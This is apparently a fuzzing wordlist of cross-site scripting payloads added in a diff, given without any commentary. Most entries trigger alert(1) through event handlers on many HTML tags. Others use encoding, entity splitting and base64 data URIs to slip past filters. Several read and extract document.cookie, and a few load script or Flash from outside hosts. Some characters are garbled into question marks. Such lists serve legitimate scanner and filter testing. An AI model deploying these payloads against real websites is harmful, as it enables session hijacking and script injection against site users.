onmousedown="alert(1)">test</ul> +<ul onmouseenter="alert(1)">test</ul> +<ul 
onmouseleave="alert(1)">test</ul> +<ul onmousemove="alert(1)">test</ul> +<ul onmouseout="alert(1)">test</ul> +<ul onmouseover="alert(1)">test</ul> +<ul onmouseup="alert(1)">test</ul> +<ul onpaste="alert(1)" contenteditable>test</ul> +<var draggable="true" ondrag="alert(1)">test</var> +<var draggable="true" ondragend="alert(1)">test</var> +<var draggable="true" ondragenter="alert(1)">test</var> +<var draggable="true" ondragleave="alert(1)">test</var> +<var draggable="true" ondragstart="alert(1)">test</var> +<var id=x tabindex=1 onactivate=alert(1)></var> +<var id=x tabindex=1 onbeforeactivate=alert(1)></var> +<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus> +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus> +<var id=x tabindex=1 onfocus=alert(1)></var> +<var id=x tabindex=1 onfocusin=alert(1)></var> +<var onbeforecopy="alert(1)" contenteditable>test</var> +<var onbeforecut="alert(1)" contenteditable>test</var> +<var onbeforepaste="alert(1)" contenteditable>test</var> +<var onblur=alert(1) tabindex=1 id=x></var><input autofocus> +<var onclick="alert(1)">test</var> +<var oncontextmenu="alert(1)">test</var> +<var oncopy="alert(1)" contenteditable>test</var> +<var oncut="alert(1)" contenteditable>test</var> +<var ondblclick="alert(1)">test</var> +<var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus> +<var onkeydown="alert(1)" contenteditable>test</var> +<var onkeypress="alert(1)" contenteditable>test</var> +<var onkeyup="alert(1)" contenteditable>test</var> +<var onmousedown="alert(1)">test</var> +<var onmouseenter="alert(1)">test</var> +<var onmouseleave="alert(1)">test</var> +<var onmousemove="alert(1)">test</var> +<var onmouseout="alert(1)">test</var> +<var onmouseover="alert(1)">test</var> +<var onmouseup="alert(1)">test</var> +<var onpaste="alert(1)" contenteditable>test</var> +<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls 
onseeked=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video draggable="true" ondrag="alert(1)">test</video> +<video draggable="true" ondragend="alert(1)">test</video> +<video draggable="true" ondragenter="alert(1)">test</video> +<video draggable="true" ondragleave="alert(1)">test</video> +<video draggable="true" ondragstart="alert(1)">test</video> +<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x controls onfocusin=alert(1)><source src="validvideo.mp4" type=video/mp4></video> +<video id=x tabindex=1 onactivate=alert(1)></video> +<video id=x tabindex=1 onbeforeactivate=alert(1)></video> +<video id=x tabindex=1 onbeforedeactivate=alert(1)></video><input autofocus> +<video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus> +<video onbeforecopy="alert(1)" contenteditable>test</video> +<video onbeforecut="alert(1)" contenteditable>test</video> +<video onbeforepaste="alert(1)" contenteditable>test</video> +<video onblur=alert(1) tabindex=1 id=x></video><input autofocus> +<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video oncanplaythrough=alert(1)><source src="validvideo.mp4" 
type="video/mp4"></video> +<video onclick="alert(1)">test</video> +<video oncontextmenu="alert(1)">test</video> +<video oncopy="alert(1)" contenteditable>test</video> +<video oncut="alert(1)" contenteditable>test</video> +<video ondblclick="alert(1)">test</video> +<video onfocusout=alert(1) tabindex=1 id=x></video><input autofocus> +<video onkeydown="alert(1)" contenteditable>test</video> +<video onkeypress="alert(1)" contenteditable>test</video> +<video onkeyup="alert(1)" contenteditable>test</video> +<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video> +<video onmousedown="alert(1)">test</video> +<video onmouseenter="alert(1)">test</video> +<video onmouseleave="alert(1)">test</video> +<video onmousemove="alert(1)">test</video> +<video onmouseout="alert(1)">test</video> +<video onmouseover="alert(1)">test</video> +<video onmouseup="alert(1)">test</video> +<video onpaste="alert(1)" contenteditable>test</video> +<video src/onerror=alert(1)> +<video><source onerror=alert(1) src=1></video> +<video><track default onload=alert(1) src="data:text/vtt,WEBVTT"></video> +<wbr draggable="true" ondrag="alert(1)">test</wbr> +<wbr draggable="true" ondragend="alert(1)">test</wbr> +<wbr draggable="true" ondragenter="alert(1)">test</wbr> +<wbr draggable="true" ondragleave="alert(1)">test</wbr> +<wbr draggable="true" ondragstart="alert(1)">test</wbr> +<wbr id=x tabindex=1 onactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr> +<wbr id=x tabindex=1 onbeforedeactivate=alert(1)></wbr><input autofocus> +<wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus> +<wbr id=x tabindex=1 onfocus=alert(1)></wbr> +<wbr id=x tabindex=1 onfocusin=alert(1)></wbr> +<wbr onbeforecopy="alert(1)" contenteditable>test</wbr> +<wbr onbeforecut="alert(1)" contenteditable>test</wbr> +<wbr onbeforepaste="alert(1)" contenteditable>test</wbr> +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onclick="alert(1)">test</wbr> 
+<wbr oncontextmenu="alert(1)">test</wbr> +<wbr oncopy="alert(1)" contenteditable>test</wbr> +<wbr oncut="alert(1)" contenteditable>test</wbr> +<wbr ondblclick="alert(1)">test</wbr> +<wbr onfocusout=alert(1) tabindex=1 id=x></wbr><input autofocus> +<wbr onkeydown="alert(1)" contenteditable>test</wbr> +<wbr onkeypress="alert(1)" contenteditable>test</wbr> +<wbr onkeyup="alert(1)" contenteditable>test</wbr> +<wbr onmousedown="alert(1)">test</wbr> +<wbr onmouseenter="alert(1)">test</wbr> +<wbr onmouseleave="alert(1)">test</wbr> +<wbr onmousemove="alert(1)">test</wbr> +<wbr onmouseout="alert(1)">test</wbr> +<wbr onmouseover="alert(1)">test</wbr> +<wbr onmouseup="alert(1)">test</wbr> +<wbr onpaste="alert(1)" contenteditable>test</wbr> +<xmp draggable="true" ondrag="alert(1)">test</xmp> +<xmp draggable="true" ondragend="alert(1)">test</xmp> +<xmp draggable="true" ondragenter="alert(1)">test</xmp> +<xmp draggable="true" ondragleave="alert(1)">test</xmp> +<xmp draggable="true" ondragstart="alert(1)">test</xmp> +<xmp id=x tabindex=1 onactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp> +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)></xmp><input autofocus> +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus> +<xmp id=x tabindex=1 onfocus=alert(1)></xmp> +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp> +<xmp onbeforecopy="alert(1)" contenteditable>test</xmp> +<xmp onbeforecut="alert(1)" contenteditable>test</xmp> +<xmp onbeforepaste="alert(1)" contenteditable>test</xmp> +<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onclick="alert(1)">test</xmp> +<xmp oncontextmenu="alert(1)">test</xmp> +<xmp oncopy="alert(1)" contenteditable>test</xmp> +<xmp oncut="alert(1)" contenteditable>test</xmp> +<xmp ondblclick="alert(1)">test</xmp> +<xmp onfocusout=alert(1) tabindex=1 id=x></xmp><input autofocus> +<xmp onkeydown="alert(1)" contenteditable>test</xmp> +<xmp onkeypress="alert(1)" contenteditable>test</xmp> +<xmp 
onkeyup="alert(1)" contenteditable>test</xmp> +<xmp onmousedown="alert(1)">test</xmp> +<xmp onmouseenter="alert(1)">test</xmp> +<xmp onmouseleave="alert(1)">test</xmp> +<xmp onmousemove="alert(1)">test</xmp> +<xmp onmouseout="alert(1)">test</xmp> +<xmp onmouseover="alert(1)">test</xmp> +<xmp onmouseup="alert(1)">test</xmp> +<xmp onpaste="alert(1)" contenteditable>test</xmp> +<xss id=x tabindex=1 onactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss> +<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onblur=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input autofocus> +<xss id=x tabindex=1 onfocus=alert(1)></xss> +<xss id=x tabindex=1 onfocusin=alert(1)></xss> +<xss id=x tabindex=1 onfocusout=alert(1)></xss><input autofocus> +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, 
{isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> +<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 
'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { 
e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># 
+<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = 
arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = 
'(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( 
);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? 
+<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? 
+<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? 
